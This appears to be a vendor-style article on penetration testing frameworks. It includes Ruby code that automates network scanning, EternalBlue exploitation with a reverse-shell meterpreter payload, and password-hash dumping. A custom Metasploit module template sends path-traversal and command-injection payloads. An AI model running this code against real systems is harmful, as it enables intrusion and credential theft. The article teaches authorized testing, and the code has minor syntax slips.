What are Penetration Testing Frameworks?
Penetration Testing Frameworks are comprehensive platforms that provide security professionals with tools, exploits, and methodologies to systematically test and validate security vulnerabilities in systems, networks, and applications. These frameworks combine automated vulnerability discovery with manual exploitation techniques to simulate real-world attacks and assess organizational security posture.
Leading frameworks include Metasploit for exploit development and automation, Core Impact for commercial enterprise testing, Canvas for advanced exploitation, and specialized tools like Burp Suite for web application testing. These platforms enable security teams to move beyond vulnerability scanning to actual exploitation and impact demonstration.
Penetration Testing Effectiveness Calculator
Total Cost: $75,200
Expected Vulnerabilities: 115
Assessment: Comprehensive Testing Coverage
Leading Penetration Testing Frameworks
Metasploit Framework
Comprehensive exploitation framework with extensive exploit database.
• Automated exploitation workflows
• Post-exploitation modules
• Payload generation and encoding
• Integration with vulnerability scanners
Core Impact
Commercial penetration testing platform with enterprise features.
• Advanced pivoting capabilities
• Comprehensive reporting
• Client-side attack simulation
• Commercial support and training
Canvas
Advanced exploitation framework with focus on complex attack scenarios.
• Advanced evasion techniques
• Custom exploit development
• Multi-stage attack campaigns
• Professional services support
Burp Suite Professional
Specialized web application security testing platform.
• Automated web app scanning
• Manual testing tools
• Extension ecosystem
• Vulnerability validation
Metasploit Framework Implementation
Automated Metasploit Scanning and Exploitation
Ruby script for automated vulnerability scanning and exploitation workflow.
#!/usr/bin/env ruby
# Automated Metasploit Penetration Testing Workflow
require 'msfrpc'
require 'json'
require 'logger'
class MetasploitAutomation
def initialize(host = '127.0.0.1', port = 55552)
@logger = Logger.new(STDOUT)
@logger.level = Logger::INFO
# Connect to Metasploit RPC
@client = Msf::RPC::Client.new(
host: host,
port: port,
uri: '/api/',
ssl: false
)
@console_id = nil
@target_hosts = []
@discovered_vulns = []
@exploitation_results = []
end
def authenticate(username = 'msf', password = 'password')
"""Authenticate with Metasploit RPC service"""
begin
result = @client.call('auth.login', username, password)
if result['result'] == 'success'
@logger.info("Successfully authenticated to Metasploit RPC")
@token = result['token']
@client.token = @token
return true
else
@logger.error("Authentication failed: #{result}")
return false
end
rescue Exception => e
@logger.error("RPC connection failed: #{e.message}")
return false
end
end
def create_console
"""Create a new Metasploit console for command execution"""
result = @client.call('console.create')
@console_id = result['id']
@logger.info("Created console with ID: #{@console_id}")
# Wait for console to be ready
sleep(2)
return @console_id
end
def run_nmap_scan(target_range)
"""Run Nmap scan through Metasploit to discover hosts and services"""
@logger.info("Starting Nmap scan of #{target_range}")
# Use Metasploit's db_nmap command for integrated scanning
nmap_command = "db_nmap -sS -sV -O -A #{target_range}"
result = @client.call('console.write', @console_id, nmap_command + "\n")
# Wait for scan completion
scan_complete = false
timeout = 300 # 5 minutes timeout
start_time = Time.now
while !scan_complete && (Time.now - start_time) < timeout
sleep(5)
# Read console output
output = @client.call('console.read', @console_id)
if output['data']
@logger.info("Scan progress: #{output['data'].lines.last&.strip}")
# Check for scan completion indicators
if output['data'].include?('Nmap done') || output['data'].include?('scan complete')
scan_complete = true
end
end
end
@logger.info("Nmap scan completed")
return get_discovered_hosts
end
def get_discovered_hosts
"""Retrieve hosts discovered during scanning"""
hosts_result = @client.call('db.hosts')
@target_hosts = []
hosts_result.each do |host_data|
host_info = {
address: host_data['address'],
os_name: host_data['os_name'] || 'Unknown',
os_sp: host_data['os_sp'] || '',
purpose: host_data['purpose'] || 'device',
services: get_host_services(host_data['address'])
}
@target_hosts << host_info
end
@logger.info("Discovered #{@target_hosts.length} hosts")
return @target_hosts
end
def get_host_services(host_address)
"""Get services for a specific host"""
services_result = @client.call('db.services', { host: host_address })
services = []
services_result.each do |service|
services << {
port: service['port'],
proto: service['proto'],
name: service['name'],
info: service['info'] || '',
state: service['state']
}
end
return services
end
def run_vulnerability_scan
"""Run vulnerability scanning using auxiliary modules"""
@logger.info("Starting vulnerability scanning")
# Common vulnerability scanner modules
vuln_scanners = [
'auxiliary/scanner/smb/smb_ms17_010', # EternalBlue
'auxiliary/scanner/ssh/ssh_login', # SSH brute force
'auxiliary/scanner/ftp/ftp_login', # FTP brute force
'auxiliary/scanner/http/dir_scanner', # Directory enumeration
'auxiliary/scanner/ssl/ssl_version', # SSL version detection
'auxiliary/scanner/mysql/mysql_login' # MySQL brute force
]
@target_hosts.each do |host|
@logger.info("Scanning host #{host[:address]}")
host[:services].each do |service|
# Select appropriate scanner based on service
scanner = select_scanner_for_service(service, vuln_scanners)
if scanner
run_auxiliary_module(scanner, host[:address], service[:port])
end
end
end
@logger.info("Vulnerability scanning completed")
end
def select_scanner_for_service(service, scanners)
"""Select appropriate scanner module for detected service"""
service_name = service[:name].downcase
port = service[:port]
case service_name
when /smb|microsoft-ds/
return 'auxiliary/scanner/smb/smb_ms17_010' if port == 445
when /ssh/
return 'auxiliary/scanner/ssh/ssh_login'
when /ftp/
return 'auxiliary/scanner/ftp/ftp_login'
when /http|https/
return 'auxiliary/scanner/http/dir_scanner'
when /mysql/
return 'auxiliary/scanner/mysql/mysql_login'
when /ssl|https/
return 'auxiliary/scanner/ssl/ssl_version'
end
return nil
end
def run_auxiliary_module(module_name, target_host, target_port)
"""Execute auxiliary scanning module"""
@logger.info("Running #{module_name} against #{target_host}:#{target_port}")
# Configure and run module
commands = [
"use #{module_name}",
"set RHOSTS #{target_host}",
"set RPORT #{target_port}",
"set THREADS 5",
"run"
]
commands.each do |command|
@client.call('console.write', @console_id, command + "\n")
sleep(1)
end
# Wait for module completion and collect results
sleep(10) # Allow time for execution
output = @client.call('console.read', @console_id)
if output['data']
parse_auxiliary_results(module_name, target_host, target_port, output['data'])
end
end
def parse_auxiliary_results(module_name, host, port, output)
"""Parse results from auxiliary module execution"""
# Look for vulnerability indicators in output
if output.include?('[+]') || output.include?('VULNERABLE')
vulnerability = {
host: host,
port: port,
module: module_name,
status: 'vulnerable',
details: output.lines.select { |line| line.include?('[+]') }.join("\n"),
timestamp: Time.now
}
@discovered_vulns << vulnerability
@logger.info("Vulnerability found: #{module_name} on #{host}:#{port}")
end
end
def attempt_exploitation
"""Attempt to exploit discovered vulnerabilities"""
@logger.info("Starting exploitation phase")
@discovered_vulns.each do |vuln|
exploit_module = map_scanner_to_exploit(vuln[:module])
if exploit_module
@logger.info("Attempting exploitation of #{vuln[:host]} with #{exploit_module}")
result = run_exploit_module(exploit_module, vuln)
@exploitation_results << result
end
end
@logger.info("Exploitation phase completed")
end
def map_scanner_to_exploit(scanner_module)
"""Map vulnerability scanner to appropriate exploit module"""
exploit_map = {
'auxiliary/scanner/smb/smb_ms17_010' => 'exploit/windows/smb/ms17_010_eternalblue',
'auxiliary/scanner/ssh/ssh_login' => 'exploit/multi/ssh/sshexec',
# Add more mappings as needed
}
return exploit_map[scanner_module]
end
def run_exploit_module(exploit_module, vulnerability)
"""Execute exploit module against vulnerable target"""
target_host = vulnerability[:host]
target_port = vulnerability[:port]
commands = [
"use #{exploit_module}",
"set RHOSTS #{target_host}",
"set RPORT #{target_port}",
"set payload windows/x64/meterpreter/reverse_tcp", # Default payload
"set LHOST 192.168.1.100", # Set appropriate LHOST
"set LPORT 4444",
"exploit"
]
commands.each do |command|
@client.call('console.write', @console_id, command + "\n")
sleep(1)
end
# Wait for exploitation attempt
sleep(15)
output = @client.call('console.read', @console_id)
exploitation_result = {
host: target_host,
port: target_port,
exploit: exploit_module,
success: output['data'].include?('Meterpreter session'),
session_id: extract_session_id(output['data']),
timestamp: Time.now,
output: output['data']
}
if exploitation_result[:success]
@logger.info("Successfully exploited #{target_host}")
perform_post_exploitation(exploitation_result[:session_id])
else
@logger.warn("Exploitation failed for #{target_host}")
end
return exploitation_result
end
def extract_session_id(output)
"""Extract Meterpreter session ID from output"""
match = output.match(/Meterpreter session (\d+) opened/)
return match[1].to_i if match
return nil
end
def perform_post_exploitation(session_id)
"""Perform post-exploitation activities"""
return unless session_id
@logger.info("Performing post-exploitation on session #{session_id}")
post_exploit_commands = [
"sessions -i #{session_id}",
"getuid",
"sysinfo",
"getprivs",
"run post/windows/gather/enum_logged_on_users",
"run post/windows/gather/hashdump",
"background"
]
post_exploit_commands.each do |command|
@client.call('console.write', @console_id, command + "\n")
sleep(2)
end
# Collect post-exploitation results
sleep(10)
output = @client.call('console.read', @console_id)
@logger.info("Post-exploitation completed for session #{session_id}")
return output['data']
end
def generate_report
"""Generate comprehensive penetration testing report"""
report = {
scan_summary: {
start_time: @scan_start_time,
end_time: Time.now,
hosts_discovered: @target_hosts.length,
vulnerabilities_found: @discovered_vulns.length,
successful_exploits: @exploitation_results.count { |r| r[:success] }
},
discovered_hosts: @target_hosts,
vulnerabilities: @discovered_vulns,
exploitation_results: @exploitation_results,
recommendations: generate_recommendations
}
# Write report to file
File.open("pentest_report_#{Time.now.strftime('%Y%m%d_%H%M%S')}.json", 'w') do |file|
file.write(JSON.pretty_generate(report))
end
@logger.info("Report generated successfully")
return report
end
def generate_recommendations
"""Generate security recommendations based on findings"""
recommendations = []
# Group vulnerabilities by type
vuln_types = @discovered_vulns.group_by { |v| v[:module] }
vuln_types.each do |module_name, vulns|
case module_name
when /smb_ms17_010/
recommendations << {
title: "Critical: EternalBlue Vulnerability",
priority: "Critical",
description: "#{vulns.length} systems vulnerable to MS17-010 (EternalBlue)",
remediation: "Apply Microsoft security update MS17-010 immediately"
}
when /ssh_login/
recommendations << {
title: "SSH Weak Authentication",
priority: "High",
description: "#{vulns.length} systems with weak SSH credentials",
remediation: "Implement strong password policies and consider key-based authentication"
}
end
end
return recommendations
end
def cleanup
"""Clean up resources and close connections"""
if @console_id
@client.call('console.destroy', @console_id)
@logger.info("Console #{@console_id} destroyed")
end
@logger.info("Cleanup completed")
end
end
# Example usage
if __FILE__ == $0
pentest = MetasploitAutomation.new
if pentest.authenticate
pentest.create_console
pentest.run_nmap_scan("192.168.1.0/24")
pentest.run_vulnerability_scan
pentest.attempt_exploitation
report = pentest.generate_report
pentest.cleanup
puts "Penetration testing completed. Report saved."
else
puts "Failed to authenticate with Metasploit RPC"
end
end
Custom Metasploit Module Development
Ruby template for developing custom Metasploit auxiliary and exploit modules.
##
# Custom Vulnerability Scanner Module for Metasploit
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Custom Application Vulnerability Scanner',
'Description' => %q{
This module scans for a custom application vulnerability
specific to the target organization's environment.
},
'Author' => ['Your Name'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-XXXX'],
['URL', 'https://example.com/vulnerability-details']
],
'DisclosureDate' => '2024-01-15'
))
register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'The target URI path', '/api/v1/']),
OptString.new('USERNAME', [false, 'Username for authentication', '']),
OptString.new('PASSWORD', [false, 'Password for authentication', '']),
OptInt.new('TIMEOUT', [true, 'Request timeout in seconds', 10])
])
end
def check
"""Check if target is vulnerable without exploitation"""
begin
connect
# Send probe request
probe_request = "GET #{datastore['TARGETURI']}health HTTP/1.1\r\n"
probe_request << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
probe_request << "User-Agent: #{Rex::UserAgent.session_agent}\r\n"
probe_request << "Connection: close\r\n\r\n"
sock.put(probe_request)
response = sock.get_once(-1, datastore['TIMEOUT'])
disconnect
if response && response.include?('Custom-App-Version: 1.2.3')
return Exploit::CheckCode::Appears
elsif response && response.include?('Custom-App')
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionError, ::Rex::ConnectionRefused, ::Timeout::Error
return Exploit::CheckCode::Unknown
end
end
def run_host(target_host)
"""Main scanner logic for each target host"""
print_status("#{target_host}:#{datastore['RPORT']} - Starting vulnerability scan")
# Check if target is potentially vulnerable
check_result = check
case check_result
when Exploit::CheckCode::Appears
print_good("#{target_host}:#{datastore['RPORT']} - Target appears vulnerable")
perform_vulnerability_test(target_host)
when Exploit::CheckCode::Detected
print_status("#{target_host}:#{datastore['RPORT']} - Custom application detected, testing...")
perform_vulnerability_test(target_host)
when Exploit::CheckCode::Safe
print_status("#{target_host}:#{datastore['RPORT']} - Target does not appear vulnerable")
else
print_status("#{target_host}:#{datastore['RPORT']} - Unable to determine vulnerability status")
end
end
def perform_vulnerability_test(target_host)
"""Perform detailed vulnerability testing"""
begin
connect
# Test for authentication bypass
auth_bypass_result = test_auth_bypass
# Test for directory traversal
directory_traversal_result = test_directory_traversal
# Test for command injection
command_injection_result = test_command_injection
disconnect
# Report findings
report_vulnerabilities(target_host, {
auth_bypass: auth_bypass_result,
directory_traversal: directory_traversal_result,
command_injection: command_injection_result
})
rescue ::Rex::ConnectionError, ::Rex::ConnectionRefused, ::Timeout::Error => e
print_error("#{target_host}:#{datastore['RPORT']} - Connection failed: #{e.message}")
end
end
def test_auth_bypass
"""Test for authentication bypass vulnerability"""
# Test malformed authentication header
auth_test_request = "GET #{datastore['TARGETURI']}admin HTTP/1.1\r\n"
auth_test_request << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
auth_test_request << "Authorization: Bearer ../../../bypass\r\n"
auth_test_request << "Connection: close\r\n\r\n"
sock.put(auth_test_request)
response = sock.get_once(-1, datastore['TIMEOUT'])
if response && response.include?('admin dashboard') && !response.include?('401')
return {
vulnerable: true,
description: 'Authentication bypass via malformed Bearer token',
risk_level: 'High'
}
end
return { vulnerable: false }
end
def test_directory_traversal
"""Test for directory traversal vulnerability"""
# Test path traversal in file parameter
traversal_payloads = [
'../../../etc/passwd',
'....//....//....//etc/passwd',
'%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd'
]
traversal_payloads.each do |payload|
traversal_request = "GET #{datastore['TARGETURI']}file?path=#{payload} HTTP/1.1\r\n"
traversal_request << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
traversal_request << "Connection: close\r\n\r\n"
sock.put(traversal_request)
response = sock.get_once(-1, datastore['TIMEOUT'])
if response && response.include?('root:x:0:0:')
return {
vulnerable: true,
description: "Directory traversal via file parameter using payload: #{payload}",
risk_level: 'High'
}
end
end
return { vulnerable: false }
end
def test_command_injection
"""Test for command injection vulnerability"""
# Test command injection in system parameter
injection_payload = "; id #"
injection_request = "POST #{datastore['TARGETURI']}system HTTP/1.1\r\n"
injection_request << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
injection_request << "Content-Type: application/json\r\n"
injection_request << "Content-Length: #{("{"command":"ping #{injection_payload}"}").length}\r\n"
injection_request << "Connection: close\r\n\r\n"
injection_request << "{\"command\":\"ping #{injection_payload}\"}"
sock.put(injection_request)
response = sock.get_once(-1, datastore['TIMEOUT'])
if response && response.match(/uid=\d+.*gid=\d+/)
return {
vulnerable: true,
description: 'Command injection in system command parameter',
risk_level: 'Critical'
}
end
return { vulnerable: false }
end
def report_vulnerabilities(target_host, results)
"""Report discovered vulnerabilities to Metasploit database"""
results.each do |vuln_type, result|
next unless result[:vulnerable]
print_good("#{target_host}:#{datastore['RPORT']} - #{result[:description]}")
# Report to Metasploit database
report_vuln(
host: target_host,
port: datastore['RPORT'],
proto: 'tcp',
name: "custom-app-#{vuln_type}",
info: result[:description],
refs: self.references
)
# Report service if not already detected
report_service(
host: target_host,
port: datastore['RPORT'],
proto: 'tcp',
name: 'http',
info: 'Custom vulnerable application'
)
end
end
end
Real-World Penetration Testing Implementations
Fortune 500 Financial Services
Comprehensive penetration testing across global infrastructure.
- • Quarterly testing with Core Impact and Metasploit Pro
- • 500+ servers across multiple data centers
- • Automated reporting and remediation tracking
- • Integration with vulnerability management program
Government Defense Contractor
High-security penetration testing with custom exploit development.
- • Canvas platform with custom zero-day exploits
- • Air-gapped environment testing capabilities
- • Multi-classification level assessment
- • Advanced persistent threat simulation
Healthcare Network
HIPAA-compliant testing focusing on patient data protection.
- • Burp Suite Professional for web application testing
- • Medical device network segmentation validation
- • Non-disruptive testing methodologies
- • Compliance-focused reporting and metrics
E-commerce Platform
Continuous penetration testing integrated with DevOps pipeline.
- • Hybrid approach using multiple open-source tools
- • Automated testing in CI/CD pipeline
- • PCI-DSS compliance validation
- • Real-time security feedback to developers
Advanced Exploitation Techniques
Network Exploitation
- • Buffer Overflows: Memory corruption vulnerabilities
- • Network Service Exploits: SMB, SSH, RDP vulnerabilities
- • Man-in-the-Middle: Network traffic interception
- • Pivoting: Using compromised hosts as attack platforms
- • Lateral Movement: Spreading through internal networks
- • Privilege Escalation: Gaining administrative access
Application Exploitation
- • SQL Injection: Database query manipulation
- • Cross-Site Scripting (XSS): Client-side code injection
- • Command Injection: Operating system command execution
- • File Upload Vulnerabilities: Malicious file execution
- • Authentication Bypass: Access control circumvention
- • Business Logic Flaws: Application workflow exploitation
Penetration Testing Framework Best Practices
✅ Do
- • Obtain proper written authorization before testing
- • Combine automated tools with manual testing techniques
- • Validate all findings before reporting to eliminate false positives
- • Document exploitation steps with proof-of-concept evidence
- • Provide clear remediation guidance for discovered vulnerabilities
- • Follow responsible disclosure practices for findings
❌ Don't
- • Perform testing without proper authorization and scope definition
- • Rely solely on automated scanning without manual validation
- • Cause unnecessary disruption to production systems
- • Access or modify sensitive data beyond proof-of-concept
- • Share exploitation techniques or tools with unauthorized parties
- • Ignore proper cleanup and artifact removal after testing